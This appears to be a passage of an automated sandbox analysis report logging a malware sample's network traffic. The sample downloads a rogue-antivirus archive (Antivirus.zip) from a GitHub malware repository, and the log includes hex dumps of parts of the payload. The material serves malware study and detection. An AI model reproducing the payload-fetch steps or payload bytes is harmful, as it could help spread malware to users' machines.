                                                                                                        2022-09-29 12:46:02 UTC7587INData Raw: 0a 6f 22 76 ea b6 03 94 0f a2 b5 62 5a d3 e9 8a 58 c5 dd 95 de 27 e8 be 6a 54 5f 23 da f6 84 43 32 7c 46 14 be 19 e2 da b3 1a 1c aa 1f 02 46 23 7d 80 72 e0 2d 0b 5f 9c 7f 81 0e e1 37 7c e3 1d 1f 1a 08 8c 1e 9a 9a 80 b1 a9 41 0b 98 f8 82 8c a3 f8 4c bb fe cc 27 03 22 ed 58 d3 9f 38 7c ab f1 c4 4e ba ac 4d 5d e7 c5 c1 96 a4 4b 20 51 a4 b0 c2 d1 de 3b 48 a0 ea f4 15 30 d3 70 9e 38 79 84 ac 29 ce 1f a2 ec 86 f3 5f 2f 07 3f 40 4c 36 85 a7 03 2a 00 da de 1c fc ef 14 b0 6e 04 75 e0 d7 39 b2 2d e3 e5 ce 37 f6 96 25 ae eb c0 f4 3d 0c cd 7e 62 aa 27 f9 79 f2 3e ef f4 11 d3 7d aa 34 b7 f5 ab bd 5b 5c 53 99 85 a4 d7 69 d8 44 d6 b5 d0 35 15 54 fb 31 53 27 df 34 de d1 e1 15 db b4 7c 9b 0e 31 c7 d4 6c 2e dc 0b 17 b2 ec fe db 1a c4 24 cd 0e 67 96 00 0b 35 a0 d7 02 e6 b1
                                                                                                        Data Ascii: o"vbZX'jT_#C2|FF#}r-_7|AL'"X8|NM]K Q;H0p8y)_/?@L6*nu9-7%=~b'y>}4[\SiD5T1S'4|1l.$g5


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        28192.168.2.449770140.82.121.3443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2022-09-29 12:46:05 UTC7598OUTGET /Endermanch/MalwareDatabase/raw/master/rogues/Antivirus.zip HTTP/1.1
                                                                                                        Host: github.com
                                                                                                        2022-09-29 12:46:05 UTC7598INHTTP/1.1 302 Found
                                                                                                        Server: GitHub.com
                                                                                                        Date: Thu, 29 Sep 2022 12:44:19 GMT
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                        Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                        Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/Antivirus.zip
                                                                                                        Cache-Control: no-cache
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                        X-Frame-Options: deny
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-XSS-Protection: 0
                                                                                                        Referrer-Policy: no-referrer-when-downgrade
                                                                                                        Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                        2022-09-29 12:46:05 UTC7599INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                        Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        29192.168.2.449771185.199.110.133443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2022-09-29 12:46:05 UTC7600OUTGET /Endermanch/MalwareDatabase/master/rogues/Antivirus.zip HTTP/1.1
                                                                                                        Host: raw.githubusercontent.com
                                                                                                        2022-09-29 12:46:05 UTC7601INHTTP/1.1 200 OK
                                                                                                        Connection: close
                                                                                                        Content-Length: 1410736
                                                                                                        Cache-Control: max-age=300
                                                                                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                        Content-Type: application/zip
                                                                                                        ETag: "245193138e3f9b39cf44c134a58bf8b376783e8722bddc3a8150360e1df811da"
                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-Frame-Options: deny
                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                        X-GitHub-Request-Id: 082B:AB9E:ECAD7E:FC2F3E:6335934D
                                                                                                        Accept-Ranges: bytes
                                                                                                        Date: Thu, 29 Sep 2022 12:46:05 GMT
                                                                                                        Via: 1.1 varnish
                                                                                                        X-Served-By: cache-mxp6945-MXP
                                                                                                        X-Cache: HIT
                                                                                                        X-Cache-Hits: 1
                                                                                                        X-Timer: S1664455566.573336,VS0,VE2
                                                                                                        Vary: Authorization,Accept-Encoding,Origin
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        X-Fastly-Request-ID: f3f785128a710993bfc869306570caaea98d95b1
                                                                                                        Expires: Thu, 29 Sep 2022 12:51:05 GMT
                                                                                                        Source-Age: 64
                                                                                                        2022-09-29 12:46:05 UTC7601INData Raw: 50 4b 03 04 14 00 01 00 08 00 07 13 99 43 46 06 5c d7 fa 85 15 00 00 8a 1f 00 18 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 41 6e 74 69 76 69 72 75 73 2e 65 78 65 c6 7a f1 ff 6f 5f 2b 10 01 9f 9f e1 23 1b 17 e7 90 6d 67 f3 c3 f9 24 f2 59 57 1e ae 47 e5 70 43 6f 74 d3 73 c5 89 ff cc 24 c7 9e c3 ac d7 0a a2 52 de 99 d6 8b 1a 61 86 8b 3a 8a 7f ba a0 aa 63 ff 6c 89 3f a6 2c 72 ef 29 69 ae 9c 49 04 bf f3 7a 15 30 09 32 46 b3 35 83 df 62 92 46 b9 b1 59 06 cd 5d 8b 43 b1 1a 81 70 6f ca af 98 7f 22 13 fe 1d 95 a8 28 7f d5 3e 47 f6 a5 4d 36 8f 22 37 d9 7e 91 94 7d da 95 a4 c0 f6 56 43 62 16 e8 5f 2e 55 e0 4c eb f1 7f 05 c8 09 ee c1 82 9e a9 36 6f a6 d9 d4 c8 95 fa 88 a7 ce 2e 0d d1 9f 23 41 c5 a4 5b 09 88 31 b6 e0 f6 2e ae a8 b9 3d 9e fd 7d 10 72 10 c9 3d 42 20 0c
                                                                                                        Data Ascii: PKCF\Endermanch@Antivirus.exezo_+#mg$YWGpCots$Ra:cl?,r)iIz02F5bFY]Cpo"(>GM6"7~}VCb_.UL6o.#A[1.=}r=B
                                                                                                        2022-09-29 12:46:05 UTC7603INData Raw: 38 34 d4 8c 23 2a 46 52 0f 01 cf ce 99 ca 59 56 0f 64 05 eb d7 03 ea 04 c7 b6 43 68 33 5c 8f f1 e6 c3 12 09 e4 c1 4a f9 49 af 7b 6b 8f a4 13 34 1e e0 c7 db 7d 85 b5 74 2f c8 af 45 e0 0c 46 7c ec 7e 8f 00 69 aa d4 d5 bf 16 a0 2d af 97 64 4f d4 45 97 44 1b 57 0c 24 ac 2b 03 71 7a 18 5f de f1 bb e6 1b 09 58 ce c6 a0 66 61 d8 6f d8 85 eb 6e 3b 1e d5 51 80 6d 88 77 8b 05 ba 98 ab 70 e3 11 65 0b 16 33 c2 7c 4d c2 70 86 10 82 46 e0 fc 93 8a e5 9c 60 98 23 84 96 07 5b be 0f 31 0f 00 e3 0a 17 b0 d1 5b 32 18 d9 2f 08 7d 35 44 a5 34 2a 71 b4 d8 9c 15 d1 59 df 27 b6 cc 6b 26 9d 1b e3 ea 3a e0 d5 e0 7a 3f 36 97 63 84 f8 02 24 6e 45 69 59 cb 33 87 fe 1a 86 1a 61 a9 7d a6 fb a9 df 72 d6 75 a0 d3 d4 45 ff a7 fd e2 0c f5 9c eb 86 5a 2a 88 e8 19 b8 f9 ba 40 7c b6 ad 17 1d
                                                                                                        Data Ascii: 84#*FRYVdCh3\JI{k4}t/EF|~i-dOEDW$+qz_Xfaon;Qmwpe3|MpF`#[1[2/}5D4*qY'k&:z?6c$nEiY3a}ruEZ*@|
                                                                                                        2022-09-29 12:46:05 UTC7604INData Raw: 2e ed 04 f3 f2 94 1c b2 cc 8b 66 6e 0f 08 b2 d6 5a 5f 20 c0 5e 5e 21 20 2a 8b 89 11 80 6d 0b 3c 5f 32 24 1a 0f f6 f9 a3 07 38 02 b9 2d dd c4 a3 81 21 dc 15 01 41 88 fd 48 ce cc 91 c7 47 3d 78 4b d3 48 08 b8 af 73 14 b7 1a 81 49 90 ce d0 1a 9b 7d 5e f3 de 3d c0 5a a1 65 2d 06 18 0d 29 3d 9d b0 3d 10 28 3e b6 52 a0 dc 29 f9 f1 7d 26 ef 1d 05 53 f0 ed ee 98 66 ce 05 e2 28 98 4b b0 67 59 b6 ae 06 4f 94 f2 f1 d7 c4 38 87 be 8b 0a 26 d3 81 43 33 19 62 f7 37 f8 e3 a4 d2 9e 11 95 10 e1 a6 34 13 d5 8b d3 19 56 21 84 a9 ef 57 f2 c4 49 3f 57 f4 6d 85 4e b8 db 4a f4 4c 4f 03 74 30 45 b6 75 93 71 e3 ab cd f4 28 37 31 e9 8c 05 e0 09 89 d7 c3 fe 3c d8 8f ab 66 aa 3d c1 14 84 3d 0a 4e 02 82 ee 84 af 27 1f 99 76 cb 88 70 a3 e9 af ea e4 32 a3 6a 75 d6 ab a2 71 26 7c d2 45
                                                                                                        Data Ascii: .fnZ_ ^^! *m<_2$8-!AHG=xKHsI}^=Ze-)==(>R)}&Sf(KgYO8&C3b74V!WI?WmNJLOt0Euq(71<f==N'vp2juq&|E
                                                                                                        2022-09-29 12:46:05 UTC7605INData Raw: 98 2a 4c e8 ea d3 90 89 e6 9a 52 be 30 ee 35 8b b0 59 21 d1 ca 09 c5 11 cc 8e 16 a1 90 35 03 e4 ef 1c 89 3e 8c 5e 5c fa 3c 94 2e 3b b6 a8 71 68 e7 dd e6 94 f3 a3 08 f7 ae 39 57 4c d4 1b 0e d3 99 90 ed 37 e5 ed d1 d0 05 12 75 9e d3 7f 98 2c 1f 62 30 2d b0 fb 29 10 60 53 b2 2a df 10 f4 34 23 e3 99 99 16 02 60 f3 e5 9f 1a a2 30 26 7c 28 b6 27 2d 69 d0 6a 80 24 88 d9 74 2f ee d2 2f e9 7f 27 32 65 bc 5b 53 7a 26 75 2a 74 6a bd 8c 4d dd ed 22 94 4a 2d 0c 79 5f 77 da 60 59 9f ee e3 33 61 60 c4 e7 3a e4 01 38 35 66 83 54 61 06 d4 e1 f4 d3 2f 12 a7 02 91 8b da 94 1e 53 70 30 dc 6b 7d 6a 83 64 ea 8e 98 a2 b9 03 75 88 a4 6e af 08 75 68 28 78 7d 5a 7d 7e 57 80 8d 33 a0 fa 23 c3 1e 74 50 a6 5a 39 66 96 8a 5f 7c c0 24 b8 63 13 9d 2b 70 5a b8 ec 78 f3 b8 7b 42 d9 df f6
                                                                                                        Data Ascii: *LR05Y!5>^\<.;qh9WL7u,b0-)`S*4#`0&|('-ij$t//'2e[Sz&u*tjM"J-y_w`Y3a`:85fTa/Sp0k}jdunuh(x}Z}~W3#tPZ9f_|$c+pZx{B
                                                                                                        2022-09-29 12:46:05 UTC7607INData Raw: 06 f4 7f 6b 8e c2 32 65 f9 f8 61 46 a7 69 52 19 9c fc d4 d2 ad 67 cc 58 67 77 6a e7 c1 b4 39 c9 88 79 39 de 81 db 95 16 c3 3c ad 96 49 4b d2 95 e4 a4 d4 f1 b4 56 65 a0 19 44 5f 51 90 9e 89 f4 b7 66 16 45 f6 80 5f 7d d8 ee 91 6a 41 43 6b 71 7c ff c2 fe 52 68 ac 2d df 6e cc 43 63 8b 21 89 f6 5e 2f ad d0 68 db 81 06 3a 4f 00 17 47 fd 66 f5 79 e3 ae 14 c4 83 a9 ca a6 b3 88 95 66 de f5 b2 31 14 19 07 f8 3e 1a 0d bd 67 73 9e b3 03 07 f5 0b aa ab 29 e8 99 34 94 b1 7a c4 5d 06 bc 0e 80 8e ff 0d cd 44 95 15 6c 58 b6 e3 11 01 39 7e 92 28 07 dd 6b ed d1 18 04 20 99 04 49 da e6 5a 1c c3 14 4f 5c ff 50 3b 21 22 41 de e3 50 b1 7e 3f e6 6a 85 63 a9 54 77 bc b8 30 a7 9a f4 28 a4 be d0 6d 4c 25 66 47 92 ed 04 87 43 ba f7 2c 64 c3 bf 94 fc 5c c6 ae 55 68 69 6d 47 1d db ee
                                                                                                        Data Ascii: k2eaFiRgXgwj9y9<IKVeD_QfE_}jACkq|Rh-nCc!^/h:OGfyf1>gs)4z]DlX9~(k IZO\P;!"AP~?jcTw0(mL%fGC,d\UhimG
                                                                                                        2022-09-29 12:46:05 UTC7608INData Raw: 3c 88 f4 76 a0 1a 43 a5 68 9f cd 69 f9 0b 01 6d 0a 0b 54 8f 50 c6 16 6e 98 73 13 a2 60 0d 1f cd 8d 64 1a 30 0e ce 30 c3 79 6e 48 3e 8f c1 6d 0f 9e da 4d 60 1e 63 55 a6 da 7a e8 2e c6 1b 45 9d 07 9c 26 7f 3c 31 33 25 54 2f 34 ef 57 8e d7 39 b0 f8 db 1c e8 de 95 cc 80 22 83 51 0a 9d 5c 74 53 d3 8c 00 41 5b 87 dd f6 4c 16 51 92 67 71 a6 d6 8f f3 72 af 5c ed c6 27 d9 ab c8 e0 da 5c 5b 6d 29 7e d0 35 09 af 29 ed d1 6a 5e ab 1c 78 ca 7a a9 4a ba 95 24 7e f8 48 66 2e a5 48 0c 14 06 40 bb f6 11 2a 6f e5 51 33 c4 b3 26 45 79 4f 22 41 66 f8 ac 81 a1 a6 6e 3e 9a ee 56 83 52 6d 25 a7 20 27 52 16 ee 72 00 2e 84 b7 49 5a f0 76 d9 bf 35 78 5a 55 0c c3 36 ef fa 70 9b cd cf b1 4e 1d 44 19 f5 80 b2 67 62 b4 ac 6a 24 f4 0e bc 6b 4c 29 f2 76 be 65 8e c7 1f 8e 6b 3f d9 7d 77
                                                                                                        Data Ascii: <vChimTPns`d00ynH>mM`cUz.E&<13%T/4W9"Q\tSA[LQgqr\'\[m)~5)j^xzJ$~Hf.H@*oQ3&EyO"Afn>VRm% 'Rr.IZv5xZU6pNDgbj$kL)vek?}w
                                                                                                        2022-09-29 12:46:05 UTC7609INData Raw: 3b 69 db ce 63 dd 1a 9d ce f9 dd 2c 6f 1b ef 00 23 a4 a5 3c 5b 7a 30 c6 ea 4a f3 01 97 a9 7b fe f4 5f aa 4a f9 22 63 67 d3 55 dc d0 eb 4f 99 0f 94 31 21 50 9a 10 00 e9 6e f9 e4 cb 9a ef 0a 70 8a 79 0f 93 03 cf f3 bb 1d 26 55 77 c0 81 60 88 8f b9 21 98 36 fe 4d 8c 18 8c 27 6c 3c 93 f4 cd f7 2c 51 74 3e 5f 24 36 48 19 bd 0d 2a c7 85 27 3c fe 0b 8c e4 3b 44 33 d0 ef c9 61 86 0c 36 88 25 f3 fa 90 9d d1 ee 8a 27 4f 29 c2 7d 68 d6 8d c3 ec 27 2d 39 87 90 12 94 8e 33 36 c2 b9 5c 8f 95 04 66 e7 bc 09 2a f3 4a ed 31 db ba aa 92 c8 3b f2 d9 e5 73 2d a6 f3 da af 00 1b e9 0d be 54 37 7c 8f 96 7a 84 1d 67 42 70 6b 2f 8b 0d a1 fd 5f 54 70 ae 0e 0b 22 ac f1 54 b5 63 0e 01 80 19 3a 39 52 59 ee 81 cf 58 07 30 41 48 8b 4e 63 66 1d c9 8b a2 e2 d7 ba 48 ba 0e f8 28 95 86 ee
                                                                                                        Data Ascii: ;ic,o#<[z0J{_J"cgUO1!Pnpy&Uw`!6M'l<,Qt>_$6H*'<;D3a6%'O)}h'-936\f*J1;s-T7|zgBpk/_Tp"Tc:9RYX0AHNcfH(
                                                                                                        2022-09-29 12:46:05 UTC7611INData Raw: ec ea ae fd 84 a5 98 45 0e 7c 60 67 08 28 bb 50 79 95 cf b3 0d 21 5f bb 79 80 46 e0 d4 86 66 29 56 0f 35 c1 84 55 34 c4 4d 94 4c bd 91 44 92 db 62 bf f9 e0 13 79 3a e7 bd d2 7c cb 01 ea bd ec cf 60 3f e3 ba f4 62 e2 4c d6 37 1a a5 dd bd 68 7e 77 08 2e 29 0f bf 42 0f 5c 03 0d 3f 9a f5 0d f4 17 f4 e1 93 c4 85 db 2e 53 31 d0 f5 fc d2 ab a1 00 12 c1 6a 9d b3 3e 14 d0 37 b9 1a 98 9c b9 cb 62 43 61 fa 39 0c dd e7 56 6d f3 00 2a eb 7e b7 53 9b 65 86 9d 0e 32 d7 6f 03 d6 5b 2b 4d de 0c d2 43 22 b4 9e e7 e0 5e 88 44 8e 68 ac 11 fc 16 f8 12 15 19 f1 e5 73 8f 83 80 14 15 b3 ae 20 04 39 62 4c 33 79 92 49 f0 10 10 f0 b7 fe 9e 6f f5 cd d1 da 27 bf 96 86 c9 3f e3 2b 26 81 7e 72 21 a7 ab 60 f1 0b 05 7d 8d 79 4f 55 49 16 fb 2f 2c bc b5 96 88 27 4e 6f b8 a7 53 a1 0e 6f 9d
                                                                                                        Data Ascii: E|`g(Py!_yFf)V5U4MLDby:|`?bL7h~w.)B\?.S1j>7bCa9Vm*~Se2o[+MC"^Dhs 9bL3yIo'?+&~r!`}yOUI/,'NoSo
                                                                                                        2022-09-29 12:46:05 UTC7612INData Raw: 9e ac 79 2b cf c6 89 cb e0 a9 42 70 8e b3 9d 8f 97 73 52 19 8d 00 02 73 22 c5 ce 15 fb b0 85 e4 2d e7 62 ba 2f 4a b3 a4 11 6d 6e f3 58 aa e1 02 02 44 a2 7c e9 d6 93 83 2b 49 0b ca 34 4a d4 00 9a 6b a2 fd 0c 6b 58 ae 8a 26 7c 1d 4b a3 a3 3f 1f b0 fe 91 5f 2e 68 02 4b 72 24 9d 3d c0 e9 bc 2f a7 fc 64 9b b4 81 fd 97 fc 12 29 53 d7 c8 43 fa 2d 07 b1 e1 42 5e 52 78 f9 1f 1f b0 ca 74 f7 92 c4 4d 96 a2 cf a7 81 fc 2b 84 6a f7 1f 10 20 de ca 76 64 31 97 4c dc fe 4f 29 72 29 e2 b7 22 95 e9 ea 24 43 c6 33 90 d4 76 a4 8f f1 4b bb 11 4a 31 33 d8 e1 ab 00 cd b7 a0 af a9 a5 ef e1 70 91 49 40 ba 46 d3 e5 35 71 2f 4e 83 32 5e df 77 a4 6b b6 1f c2 c3 1a 95 f7 18 0b f4 c2 22 52 d8 0b 8c ad 65 f6 f8 f0 87 b7 b7 0c 32 fa 0a 58 ba 0e f3 c7 bb e5 b3 48 da 54 b5 7a 7c c9 f7 e4
                                                                                                        Data Ascii: y+BpsRs"-b/JmnXD|+I4JkkX&|K?_.hKr$=/d)SC-B^RxtM+j vd1LO)r)"$C3vKJ13pI@F5q/N2^wk"Re2XHTz|
                                                                                                        2022-09-29 12:46:05 UTC7614INData Raw: 47 2a 20 bd fc e2 fb 81 cb 1f 1f 4f 27 a0 f6 8b fa e3 5d 86 28 61 1f 7e 08 41 29 90 8a e4 c9 7d 58 29 47 5d 79 15 23 cb 04 ef 25 57 33 db 22 f1 76 29 04 c9 02 30 c8 66 89 3d fb a9 c7 b8 4b 5a b5 9a 4a fe 97 2a 16 4b 05 ee 82 03 a2 b0 04 eb 52 06 59 0a 02 8f de 32 c7 31 d7 9a ac 48 f3 03 af 82 8c f4 64 ff 8e 04 8c 30 fe 38 d3 25 94 8c 6a 41 2e 95 da 50 07 88 52 fd d1 5d 2d 38 9b 32 7d f6 49 79 8f 72 a7 99 d2 41 92 0f 0f 6d 47 7a 4e e2 4b 26 a8 c2 17 a1 80 94 52 61 f2 55 5e 8c f5 1d f4 85 70 b0 99 bf de f0 42 b7 71 50 6c 76 ef 4f 24 9a 06 c2 a3 2a 6c bf fd ec 9a 34 26 48 c6 00 d4 dd 98 d6 8f e9 42 11 63 66 ff 2f 8d ad ff 60 74 05 62 9d a6 d6 a3 53 6a 97 46 1b 08 36 67 46 4d e5 e3 19 9f 0e 3a 1c b3 3e ca 8a ab c3 39 d1 b8 0d 71 57 43 7e 60 0c 84 37 5a b7 93
                                                                                                        Data Ascii: G* O'](a~A)}X)G]y#%W3"v)0f=KZJ*KRY21Hd08%jA.PR]-82}IyrAmGzNK&RaU^pBqPlvO$*l4&HBcf/`tbSjF6gFM:>9qWC~`7Z
                                                                                                        2022-09-29 12:46:05 UTC7615INData Raw: 3c 02 02 69 fb 58 1e d7 e4 05 a1 ca 60 34 15 3a 4b 26 c2 2c 9d cd 36 66 dc 8f 94 b1 87 87 9c 6b 8b e8 ec 55 0f 44 90 ed c3 bb ab 7a 03 95 22 1a 2b 5f 2e 97 e5 57 73 12 75 30 3f 7f fb 1c 6a 6f f2 7e e3 2e b0 87 93 9d 5c d9 f9 40 2e 37 44 e6 3b 94 7f 8d 96 ec 51 db 5d 43 da 1f 5d 9b 87 7a 97 8c 19 86 ac 4a 9c 19 1f 66 3e 82 85 2d ad 26 b4 16 02 d3 23 e1 52 11 d9 63 0a d9 1f 06 97 9c 7c f1 84 b3 69 69 bd 8d d7 c1 1e f9 7e c8 c5 af 4b d4 a2 bd 54 19 83 ab 1c 07 c6 9c 24 40 8b b2 95 1d 53 0d 1d 1d bc e2 6c 57 49 1b 34 6e 0c 97 e9 e7 73 8f 71 e5 b4 14 e9 ef ba 65 11 22 29 d3 9f 7b 65 25 68 0f 93 16 0f 80 43 dc cd b7 9b 7a 3e 33 1d 2f cc e7 42 63 af e0 de f3 b3 eb 50 92 2a 2e 6d 30 db 84 25 7b 89 e4 e8 22 36 5b ab e2 b6 2a ec 8f 78 13 88 43 0e 91 e2 98 04 9d 73
                                                                                                        Data Ascii: <iX`4:K&,6fkUDz"+_.Wsu0?jo~.\@.7D;Q]C]zJf>-&#Rc|ii~KT$@SlWI4nsqe"){e%hCz>3/BcP*.m0%{"6[*xCs
                                                                                                        2022-09-29 12:46:05 UTC7616INData Raw: 31 7d a4 6e 3d 64 14 cc d8 0f fc 37 41 e0 80 f4 19 44 a9 09 6c 6b 8e cb 57 9e 10 cb 7e 02 7e 98 73 ee 50 57 ac 9d 33 db 71 79 d6 e7 21 b3 2e 01 1f ad f6 c9 74 c2 e4 c6 80 49 c9 b4 db 20 ae 50 b9 6f 57 19 6b 7c 9d f2 c9 ae ff 79 f2 43 40 be 40 19 64 80 13 db 2a 4e ad 9b c0 37 3e 1a 39 b5 5d 6f 47 75 e5 db 28 ea cc da 00 b8 35 9e a4 cc 0a 76 75 61 92 40 57 64 d9 bf 71 1b 97 c4 94 47 82 43 a2 8c 38 ba f1 87 81 f2 f9 bf ef da b2 e3 a3 f3 11 7d 41 0d 41 09 4b d1 84 79 c5 78 7d 4f 36 66 86 2d 12 7d b7 d3 c7 e8 1b 7e ad 54 45 bf 31 ed 50 1c ef a6 b1 51 4f 8f 5d c5 8f 5d 8d a6 5f 4b 34 5c e7 49 16 7e 16 ca 86 60 bb 9f 4d b8 38 5d cb bd f1 9d 9b ee a2 1f ba 4b 3e 63 82 33 30 fa 28 13 32 46 80 ac 11 99 30 44 ba 0b da 7c b0 5b 14 e1 7b 51 cf 48 a5 9a cf c3 c4 fe 27
                                                                                                        Data Ascii: 1}n=d7ADlkW~~sPW3qy!.tI PoWk|yC@@d*N7>9]oGu(5vua@WdqGC8}AAKyx}O6f-}~TE1PQO]]_K4\I~`M8]K>c30(2F0D|[{QH'
                                                                                                        2022-09-29 12:46:05 UTC7617INData Raw: dd e8 1f 1e 90 1b 73 3e 5a 95 d7 40 45 82 30 68 e8 c7 55 b1 1e fd 77 5e 5e 0b 7f 7b 8d fa 95 37 6a d2 cb d4 ce c0 c3 ac e4 e6 d6 c6 a1 62 94 da a0 cb 61 1e 19 44 a4 af 63 36 b0 95 c2 a8 f5 14 9b 46 1e 86 fb a8 81 1a a5 0a 22 d0 73 89 9e 20 84 ff d5 6b fa 1c a1 90 cf 20 65 0a 81 27 83 39 5e ac 3f f3 44 89 9c b0 37 ef d3 15 ca 20 f4 93 69 a9 6c 14 71 ef 9a c7 aa 89 e8 47 af af e4 c3 fd 1f bc a1 d6 e5 b5 2a 0c e9 c5 6a 90 32 e3 9c f2 e5 32 98 34 87 6b 43 20 e3 60 75 32 a2 da fd c2 84 24 21 c9 cb f9 b4 0e 1a aa 73 bc 81 ff 17 96 ff f0 d7 94 99 bc 84 6c a9 7f 6b 88 7b f3 25 fa fe 86 f0 56 d3 0d 79 ad 13 5a 56 ef 4b 7e 6a 4b a9 4e df b6 af 0c c2 97 e7 f1 b2 6f 77 fa bd 3f 55 83 1a 22 50 b9 c9 1d 53 c7 0d 96 13 b7 fd 5d 44 31 1d e3 92 f9 99 15 7a ef 45 05 42 44
                                                                                                        Data Ascii: s>Z@E0hUw^^{7jbaDc6F"s k e'9^?D7 ilqG*j224kC `u2$!slk{%VyZVK~jKNow?U"PS]D1zEBD
                                                                                                        2022-09-29 12:46:05 UTC7633INData Raw: 4a b1 0d 4b 57 95 b6 c0 cd 00 97 b9 94 72 74 d7 51 2d 8e dd 1d 9e a2 6f a6 8a df 4c a4 19 1a 07 6c c2 c1 67 ae e7 39 c5 73 95 52 a7 0a 4a 73 be 51 dd a8 e5 b7 59 c6 de 80 19 79 c2 8b 83 ef ca 76 48 06 17 bf f1 df 98 05 04 84 b0 78 50 34 54 eb e9 57 63 be 59 15 ab 7a 7f ce 4f 4b 4a 07 f3 3a 84 87 24 30 d9 3e 55 d0 8e ad 1e 0c 2b 9b 18 d2 28 da bd fc 2f 81 70 5c a4 df 19 aa 28 55 60 dd aa 46 c5 13 0a a5 03 2f 45 bd ff 5a c8 92 6e fd 8e 89 10 b1 9e af 7e 0f d4 a9 0c 9f 68 8a dd 19 85 00 35 62 5d ac 7c c9 d0 b0 64 ac 03 89 6f 74 52 c7 4f cf 1e 30 19 22 32 01 6b 4b 0e 2e a0 41 be 93 38 45 9c 76 5d 0e e9 82 83 db b1 1c cc 59 af 16 d7 45 77 61 59 82 9e d0 ff f5 56 7b 56 29 ed af f6 1a 61 be 74 ce f2 09 6d ba f6 ca 50 eb 04 c3 63 50 10 06 13 d5 86 3a 47 b4 31 b7
                                                                                                        Data Ascii: JKWrtQ-oLlg9sRJsQYyvHxP4TWcYzOKJ:$0>U+(/p\(U`F/EZn~h5b]|dotRO0"2kK.A8Ev]YEwaYV{V)atmPcP:G1
                                                                                                        2022-09-29 12:46:05 UTC7649INData Raw: 45 08 00 b1 d9 93 89 78 87 4a 41 f0 97 de ab 21 19 16 bd 9c f1 f8 42 48 1a 57 e3 58 08 72 bf 77 9f dc aa 74 36 2f 74 35 80 ad 79 c1 9e 00 4c 2e 36 1b cc 04 7f 15 96 2a 97 63 7e ae c3 7d b2 ce 68 84 59 c6 15 62 b7 44 b9 2e 15 62 b1 20 24 91 c8 84 ff 2b 93 a4 f4 53 1d f7 5a 03 a4 9a 2b 13 af 4e e7 72 46 1a 79 dc 2e 9d 2d ca 04 5e c0 c6 95 b6 78 ba b6 1e 38 0f 40 99 9e d3 be 69 08 30 bb 81 96 77 d4 80 e3 6d 6c 9d 44 fc 90 ee 45 cb ba 16 c2 54 0a ef d2 bb 38 04 33 34 20 b7 87 ed 70 39 74 04 81 ef 3f 65 10 7c 5d a4 08 10 f2 0b f8 f2 51 cd b0 7b b9 f0 e0 e8 33 aa 98 c6 93 e2 44 a2 6b a1 bc f5 ff 71 81 57 99 d6 6f 2c 15 67 9f cb c6 5b 9b 11 71 b4 59 eb a1 7d b5 0e a0 01 32 97 dc 1e 33 d5 c1 d0 a7 57 1e 6d ad 05 a1 0b 25 1f 1c 9c 80 e6 f9 b4 1d d3 24 55 c7 de 3b
                                                                                                        Data Ascii: ExJA!BHWXrwt6/t5yL.6*c~}hYbD.b $+SZ+NrFy.-^x8@i0wmlDET834 p9t?e|]Q{3DkqWo,g[qY}23Wm%$U;
